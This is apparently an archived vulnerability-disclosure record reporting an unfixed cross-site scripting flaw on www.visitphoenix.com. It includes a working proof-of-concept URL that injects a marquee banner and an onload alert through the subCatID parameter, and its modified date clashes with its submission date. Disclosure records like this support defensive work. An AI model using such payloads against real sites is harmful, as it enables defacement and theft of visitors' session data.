Unfixed XSS vulnerability at www.visitphoenix.com

ID XSSED:20109
Type xssed
Reporter Narcoticxs
Modified 2007-02-10T00:00:00


Security researcher Narcoticxs, has submitted on 28/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.visitphoenix.com, which at the time of submission ranked 523014 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.visitphoenix.com/listings/index.cfm?action=showSub&catID=12&subCatID=%22%3E%3Cmarquee%3E%3Ch1%3EBy+Narcoticxs%3C/h1%3E%3C/marquee%3E%3Cbody%20onload=alert(1)%3E